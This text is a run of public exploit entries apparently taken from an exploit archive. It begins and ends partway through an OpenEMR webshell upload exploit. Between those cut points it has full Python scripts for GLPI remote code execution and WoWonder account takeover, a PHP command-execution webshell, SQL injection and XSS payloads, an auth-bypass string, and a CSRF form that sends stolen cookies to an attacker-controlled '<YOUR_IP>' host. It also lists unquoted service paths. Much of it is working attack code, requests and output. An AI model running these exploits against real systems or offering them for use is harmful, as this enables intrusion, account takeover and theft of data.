a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"destination\"\r\n\r\n\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"patient_id\"\r\n\r\n4\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"category_id\"\r\n\r\n4\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"process\"\r\n\r\ntrue\r\n-----------------------------370797319835249590062969815666--\r\n"
# Exploit
x = session.post(url_upload, headers=header,data=body).text
print('')
print('[+] Uploading your Webshell')
b = x[x.find('documents/') + 10:]
c = b[:b.find('<')]
webshellpath = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/documents/' + c
print(' [*] Webshell: ' + webshellpath)
print('')
# Exploit Title: Solar-Log 500 2.8.2 - Incorrect Access Control
# Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP""
# Date: 2021-06-11
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.solar-log.com/en/
# Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/
# Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013
# Tested on: It is a proprietary devices: https://www.solar-log.com/en/support/firmware/
# 1. Description:
# The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication,
# which allows arbitrary remote attackers to gain administrative privileges by connecting to the server.
# As a result, the attacker can modify configuration files and change the system status.
# 2. Proof of Concept:
# Access the /lan.html of Solar-Log 500 without ANY authentication,
# and you can get gain administrative privileges to modify configuration files and change the system status.
# http://<Your Modem IP>/lan.html
# Exploit Title: Solar-Log 500 2.8.2 - Unprotected Storage of Credentials
# Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP""
# Date: 2021-06-11
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.solar-log.com/en/
# Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/
# Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013
# Tested on: It is a proprietary devices: https://www.solar-log.com/en/support/firmware/
# 1. Description:
# An issue was discovered in Solar-Log 500 prior to 2.8.2 Build 52 - 23.04.2013.
# In /export.html, email.html, sms.html, the devices store plaintext passwords,
# which may allow sensitive information to be read by someone with access to the device.
# 2. Proof of Concept:
# Browse the configuration page in Solar-Log 500,
# we can find out that the passwords of FTP, SMTP, SMS services are stored in plaintext.
# http://<Your Modem IP>/export.html
# http://<Your Modem IP>/email.html
# http://<Your Modem IP>/sms.html
# Exploit Title: Grocery crud 1.6.4 - 'order_by' SQL Injection
# Date: 11/06/1963
# Exploit Author: TonyShavez
# Vendor Homepage: https://www.grocerycrud.com/
# Software Link: https://www.grocerycrud.com/downloads
# Version: < v2.0.1
# Tested on: [Linux Ubuntu]
Proof Of concept :
=======================
#Request:
POST /path/to/ajax_list HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
DNT: 1
Connection: close
page=1&per_page=100&order_b=&order_by[]={INJECT HERE}&search_field=&search_text=
=======================
#vulnerable parameter :
order_by
=======================
#type : [error-based]
# Exploit Title: WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF
# Date: 2/10/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/database-backups/
# Version: 1.2.2.6
# Tested on: Windows 10
# CVE: CVE-2021-24174
1. Description:
This plugin allows admins to create and download database backups. A CSRF can create DB backups stored publicly in the uploads directory.
2. Proof of Concept:
<form action="http://localhost/wp-admin/tools.php?page=database-backups" method="post">
<input type="hidden" name="do_backup_manually" value="1">
<input type="submit" class="button button-primary" value="Do backup" autocomplete="off">
</form>
Backups can be accessed by the following URL.
http://localhost/wp-content/uploads/database-backups/
# Exploit Title: Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)
# Date: 05–02–2021
# Exploit Author: Avinash R
# Vendor Homepage: https://zenar.io/
# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8
# Version: 8.8.52729
# Tested on: Windows 10 Pro (No OS restrictions)
# CVE : CVE-2021–27673
# Reference: https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38
##### Step To Reproduce #####
1) Login to the admin page of Zenario CMS with admin credentials, which is
http://server_ip/zenario/admin.php
2) Click on, New → HTML page to create a new sample page and intercept it
with your interceptor.
3) Just a single quote on the 'cID' parameter will confirm the SQL
injection.
4) After confirming that the 'cID' parameter is vulnerable to SQL
injection, feeding the request to SQLMAP will do the rest of the work for
you.
############ End ############
# Exploit Title: GLPI 9.4.5 - Remote Code Execution (RCE)
# Exploit Author: Brian Peters
# Vendor Homepage: https://glpi-project.org
# Software Link: https://github.com/glpi-project/glpi/releases
# Version: < 9.4.6
# CVE: CVE-2020-11060
# Download a SQL dump and find the table offset for "wifinetworks" with
# cat <sqlfile> | grep "CREATE TABLE" | grep -n wifinetworks
# Update the offsettable value with this number in the create_dump function
# The Nix/Win paths are based on defaults. You can use curl -I <url> and use md5sum to find the path based
# on the Set-Cookie hash.
#!/usr/bin/python
import argparse
import json
import random
import re
import requests
import string
import sys
import time
from datetime import datetime
from lxml import html
class GlpiBrowser:
def __init__(self, url, user, password, platform):
self.url = url
self.user = user
self.password = password
self.platform = platform
self.session = requests.Session()
self.session.verify = False
requests.packages.urllib3.disable_warnings()
def extract_csrf(self, html):
return re.findall('name="_glpi_csrf_token" value="([a-f0-9]{32})"', html)[0]
def get_login_data(self):
r = self.session.get('{0}'.format(self.url), allow_redirects=True)
csrf_token = self.extract_csrf(r.text)
name_field = re.findall('name="(.*)" id="login_name"', r.text)[0]
pass_field = re.findall('name="(.*)" id="login_password"', r.text)[0]
return name_field, pass_field, csrf_token
def login(self):
try:
name_field, pass_field, csrf_token = self.get_login_data()
except Exception as e:
print "[-] Login error: could not retrieve form data"
sys.exit(1)
data = {
name_field: self.user,
pass_field: self.password,
"auth": "local",
"submit": "Post",
"_glpi_csrf_token": csrf_token
}
r = self.session.post('{}/front/login.php'.format(self.url), data=data, allow_redirects=False)
return r.status_code == 302
def wipe_networks(self, padding, datemod):
r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt')
comment = r.content
r = self.session.get('{0}/front/wifinetwork.php#modal_massaction_contentb5e83b3aa28f203595c34c5dbcea85c9'.format(self.url))
try:
csrf_token = self.extract_csrf(r.text)
except Exception as e:
print "[-] Edit network error: could not retrieve form data"
sys.exit(1)
webpage = html.fromstring(r.content)
links = webpage.xpath('//a/@href')
for rawlink in links:
if "wifinetwork.form.php?id=" in rawlink:
rawlinkparts = rawlink.split("=")
networkid = rawlinkparts[-1]
print "Deleting network "+networkid
data = {
"entities_id": "0",
"is_recursive": "0",
"name": "PoC",
"comment": comment,
"essid": "RCE"+padding,
"mode": "ad-hoc",
"purge": "Delete permanently",
"id": networkid,
"_glpi_csrf_token": csrf_token,
'_read_date_mod': datemod
}
r = self.session.post('{}/front/wifinetwork.form.php'.format(self.url), data=data)
def create_network(self, datemod):
r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt')
comment = r.content
r = self.session.get('{0}/front/wifinetwork.php'.format(self.url))
try:
csrf_token = self.extract_csrf(r.text)
except Exception as e:
print "[-] Create network error: could not retrieve form data"
sys.exit(1)
data = {
"entities_id": "0",
"is_recursive": "0",
"name": "PoC",
"comment": comment,
"essid": "RCE",
"mode": "ad-hoc",
"add": "ADD",
"_glpi_csrf_token": csrf_token,
'_read_date_mod': datemod
}
r = self.session.post('{}/front/wifinetwork.form.php'.format(self.url), data=data)
print "[+] Network created"
print " Name: PoC"
print " ESSID: RCE"
def edit_network(self, padding, datemod):
r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt')
comment = r.content
#create the padding for the name and essid
r = self.session.get('{0}/front/wifinetwork.php'.format(self.url))
webpage = html.fromstring(r.content)
links = webpage.xpath('//a/@href')
for rawlink in links:
if "wifinetwork.form.php?id=" in rawlink:
rawlinkparts = rawlink.split('/')
link = rawlinkparts[-1]
#edit the network name and essid
r = self.session.get('{0}/front/{1}'.format(self.url, link))
try:
csrf_token = self.extract_csrf(r.text)
except Exception as e:
print "[-] Edit network error: could not retrieve form data"
sys.exit(1)
rawlinkparts = rawlink.split("=")
networkid = rawlinkparts[-1]
data = {
"entities_id": "0",
"is_recursive": "0",
"name": "PoC",
"comment": comment,
"essid": "RCE"+padding,
"mode": "ad-hoc",
"update": "Save",
"id": networkid,
"_glpi_csrf_token": csrf_token,
"_read_date_mod": datemod
}
r = self.session.post('{0}/front/wifinetwork.form.php'.format(self.url), data=data)
print "[+] Network mofified"
print " New ESSID: RCE"+padding
def create_dump(self, shellname):
path=''
if self.platform == "Win":
path="C:\\xampp\\htdocs\\pics\\"
elif self.platform == "Nix":
path="/var/www/html/glpi/pics/"
#adjust offset number to match the table number for wifi_networks
#this can be found by downloading a SQL dump and running cat <dumpname> | grep "CREATE TABLE" | grep -n "wifinetworks"
r = self.session.get('{0}/front/backup.php?dump=dump&offsettable=312&fichier={1}{2}'.format(self.url, path, shellname))
print '[+] Shell: {0}/pics/{1}'.format(self.url, shellname)
def shell_check(self, shellname):
r = self.session.get('{0}/pics/{1}?0=echo%20asdfasdfasdf'.format(self.url, shellname))
print " Shell size: "+str(len(r.content))
if "asdfasdfasdf" in r.content:
print "[+] RCE FOUND!"
sys.exit(1)
return len(r.content)
def pwn(self):
if not self.login():
print "[-] Login error"
return
else:
print "[+] Logged in"
#create timestamp
now = datetime.now()
datemod = now.strftime("%Y-%m-%d %H:%M:%S")
#create comment payload
tick=1
while True:
#create random shell name
letters = string.ascii_letters
shellname = ''.join(random.choice(letters) for i in range(8))+".php"
#create padding for ESSID
padding = ''
for i in range(1,int(tick)+1):
padding+=str(i)
self.wipe_networks(padding, datemod)
self.create_network(datemod)
self.edit_network(padding, datemod)
self.create_dump(shellname)
self.shell_check(shellname)
print "\n"
raw_input("Press any key to continue with the next iteration...")
tick+=1
return
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--url", help="Target URL", required=True)
parser.add_argument("--user", help="Username", required=True)
parser.add_argument("--password", help="Password", required=True)
parser.add_argument("--platform", help="Win/Nix", required=True)
args = parser.parse_args()
g = GlpiBrowser(args.url, user=args.user, password=args.password, platform=args.platform)
g.pwn()
# Exploit Title: Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Author: Abdulazeez Alaseeri
# Tested on: JBoss server/windows
# Type: Web App
# Date: 07/06/2021
# CVE: CVE-2021-34369
================================================================
Accela Civic Platform Insecure Direct Object References <= 21.1
================================================================
This vulnerability allows authenticated attackers to view other user's data by manpulating the value of contactSeqNumber
================================================================
Request Heeaders start
================================================================
GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1
Host: Hidden
Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Heeaders end
================================================================
================================================================
Response Heeaders start
================================================================
HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Powered-By: JSP/2.3
Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure
Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure
Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure
Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure
X-XSS-Protection: 0
Pragma: No-cache
X-UA-Compatible: IE=EDGE
Date: Wed, 09 Jun 2021 04:09:40 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98126
================================================================
Response Heeaders end
================================================================
contactSeqNumber value can be changed and return valid information about another user and that indicates it is vulnerable to IDOR
# Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Author: Abdulazeez Alaseeri
# Tested on: JBoss server/windows
# Type: Web App
# Date: 07/06/2021
# CVE-2021-34370
================================================================
Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1
================================================================
================================================================
Request Heeaders start
================================================================
GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1
Host: Hidden
Cookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Heeaders end
================================================================
================================================================
Response Heeaders start
================================================================
HTTP/1.1 200 OK
Connection: close
Set-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter
X-XSS-Protection: 0
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 73
Date: Tue, 08 Jun 2021 10:41:59 GMT
<script type='text/javascript'>document.location=''^alert`1`^''</script>
================================================================
Response Heeaders end
================================================================
Payload: %27^alert`1`^%27
for open redirect, replace the payload to a valid website.
# Exploit Title: WoWonder Social Network Platform 3.1 - Authentication Bypass
# Date: 11.06.2021
# Exploit Author: securityforeveryone.com
# Researchers : Security For Everyone Team - https://securityforeveryone.com
# Vendor Homepage: https://www.wowonder.com/
# Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302
# Version: < 3.1
# Tested on: Linux/Windows
'''
DESCRIPTION
In WoWonder < 3.1, remote attackers can take over any account due to the weak cryptographic algorithm in recover.php. The code parameter is easily predicted from the time of day.
The vulnerability is found the "code" parameter in password reset link. The password reset code can be estimated by combining the password reset link time and the random value generated between 111 and 999.
if an attacker exploits this vulnerability, attacker may access all accounts in WoWonder application.
ABOUT SECURITY FOR EVERYONE TEAM
We are a team that has been working on cyber security in the industry for a long time.
In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools
'''
import requests
import email.utils as eut
import calendar, time;
import hashlib, re;
url = "http://wowonderlab:80/wowonder/" #change this with your target
myheaders = {"X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Connection": "close"}
recoverdata = {"recoveremail": "wowondertest@securityforeveryone.com"} #change this email with your registered wowonder email address
req = requests.post(url+"requests.php?f=recover", headers=myheaders, data=recoverdata)
b = eut.parsedate(req.headers["Date"])
respepoch = calendar.timegm(time.strptime("{0}-{1}-{2} {3}:{4}:{5}".format(b[0],b[1],b[2],b[3],b[4],b[5]), '%Y-%m-%d %H:%M:%S'))
for token in range(111,1000):
str2hash = "{0}{1}".format(token,respepoch)
email_code = hashlib.md5(str2hash.encode()).hexdigest()
req_reset = requests.get(url+"index.php?link1=reset-password&code=1_{0}".format(email_code))
if len(re.findall("New password",req_reset.text)) == 1:
print(email_code)
resetdata = {"password": "10711071", "id": "1_"+email_code}
reqtoken = requests.post(url+"requests.php?f=reset_password", headers=myheaders, data=resetdata)
print(reqtoken.headers['Set-Cookie'])
break
# Exploit Title: COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)
# Date: 11/06/2021
# Exploit Author: BHAVESH KAUL
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Server: XAMPP
# Description #
COVID19 Testing Management System 1.0 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitization. Anyone can submit a stored XSS payload without login when registering as a new user. This makes the application store our payload in the database and it is fired everything the dashboard is viewed.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/covid-tms/new-user-testing.php
2) Enter the following payload in 'State' parameter: <script>alert(1)</script>
3) Fill out other information and submit query
4) Now goto: http://localhost/covid-tms/live-test-updates.php
5) Stored XSS payload is fired
# Image PoC : Reference Image #
1) Vulnerable Parameter: https://ibb.co/1vyNM2w
2) Payload Fired: https://ibb.co/CsfPnXK
# Exploit Title: Spy Emergency 25.0.650 - Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2021-06-11
# Vendor Homepage: https://www.spy-emergency.com/
# Software Link: https://www.spy-emergency.com/download/download.php?id=1
# Tested Version: 25.0.650.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "SpyEmrg"| findstr /i /v """
Spy Emergency Health Check SpyEmrgHealth C:\Program Files\NETGATE\Spy Emergency\SpyEmergencyHealth.exe Auto
Spy Emergency Engine Service SpyEmrgSrv C:\Program Files\NETGATE\Spy Emergency\SpyEmergencySrv.exe Auto
# Service info
C:>sc qc "SpyEmrgHealth"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SpyEmrgHealth
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\NETGATE\Spy Emergency\SpyEmergencyHealth.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Spy Emergency Health Check
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# Service info
C:\>sc qc "SpyEmrgSrv"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SpyEmrgSrv
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\NETGATE\Spy Emergency\SpyEmergencySrv.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Spy Emergency Engine Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
# Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
# Date : 2021/09/06
# Exploit Author : Mert Daş merterpreter@gmail.com
# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
# Software web : https://textpattern.com/
# Tested on: Server : Xampp
First of all we should use file upload section to upload our shell.
Our shell contains this malicious code: <?PHP system($_GET['cmd']);?>
1) Go to content section .
2) Click Files and upload malicious php file.
3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;
After upload our file , our request and respons is like below :
Request:
GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Thu, 10 Jun 2021 00:32:41 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Content-Length: 22
Connection: close
Content-Type: text/html; charset=UTF-8
pc\mertdas
# Exploit Title: Small CRM 3.0 - 'Authentication Bypass' SQL Injection
# Date: 12/06/2021
# Exploit Author: BHAVESH KAUL
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/small-crm-php/
# Version: 3.0
# Tested on: Server: XAMPP
# Description #
Small CRM 3.0 is vulnerable to SQL Injection on it's admin login because of insufficient user supplied data sanitization and the sql injection payload being executed. Attacker is able to access the admin login panel and supply the malicious payload, successfully taking over admin account.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/crm/admin/
2) Enter the following payload in 'Username' and 'Password' parameter: ' OR 'x'='x
3) SQL Injection successfull
# Exploit Title: Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)
# Date: 11/06/2021
# Exploit Author: Riadh Benlamine (rbn0x00)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip
# Version: 1.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : Stock Management System suffers from SQL injection in '/stock/php_action/changePassword.php' because it does not sanitize the input before pushing into the sql query. Leading to remote code execution.
- Vulnerable parameter: user_id=<injection point>
SQLmap command:
--------------
sqlmap -u http://<target_host>/stock/php_action/changePassword.php --data="password=invalidpassword&npassword=test&cpassword=test&user_id=1*" --cookie="PHPSESSID=<your cookie>" --is-dba
SQLmap Output:
-------------
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: password=invalidpassword&npassword=test&cpassword=test&user_id=(SELECT (CASE WHEN (7792=7792) THEN 1 ELSE (SELECT 5315 UNION SELECT 6564) END))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: password=invalidpassword&npassword=test&cpassword=test&user_id=1 AND (SELECT 8344 FROM (SELECT(SLEEP(5)))RdSH)
Trick:
-----
We could steal the users cookie by chaining CSRF and stored XSS
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://<YOUR_TARGET>/stock/php_action/changeUsername.php" method="POST">
<input type="hidden" name="username" value=""><script> alert(document.cookie); var i=new Image; i.src="http://<YOUR_IP>:<YOUR_PORT>/?"+document.cookie; </script>" />
<input type="hidden" name="user_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
and then use the cookie to preform SQL injection :)
# Exploit Title: WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 13-06-2021
# Vendor Homepage: https://www.wibu.com
# Software Links: https://www.wibu.com/us/support/user/downloads-user-software/file/download/5792.html
# Tested Version: 6.51
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
WIBU-KEY Server
WkSvW32.exe C:\PROGRAM FILES
(X86)\WIBUKEY\SERVER\WkSvW32.exe
Auto
C:\Users\IEUser>sc qc WkSvW32.exe
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WkSvW32.exe
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\PROGRAM FILES
(X86)\WIBUKEY\SERVER\WkSvW32.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WIBU-KEY Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)
# Date 12.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip
# Version: Prior to 5.0.1.4
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-15139
# CWE: CWE-434
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139
'''
Description:
Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote
authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload
form and accessing it in the images directory.
'''
'''
Banner:
'''
banner ="""
___ _____ __ __ ____ ____ ___ _ _____
/ _ \ _ __ ___ _ __ | ____| \/ | _ \ | ___| / _ \ / | |___ /
| | | | '_ \ / _ \ '_ \| _| | |\/| | |_) | _____ |___ \| | | || | |_ \
| |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) |
\___/| .__/ \___|_| |_|_____|_| |_|_| \_\ |____(_)___(_)_(_)____/
|_|
_____ _ _ _
| ____|_ ___ __ | | ___ (_) |_
| _| \ \/ / '_ \| |/ _ \| | __|
| |___ > <| |_) | | (_) | | |_
|_____/_/\_\ .__/|_|\___/|_|\__|
|_|
"""
print(banner)
'''
Import required modules
'''
import argparse
import requests
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
openemr_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
'''
Authentication:
'''
# Preparation:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'
auth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default'
response = session.get(auth_chek_url)
# Header (auth):
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
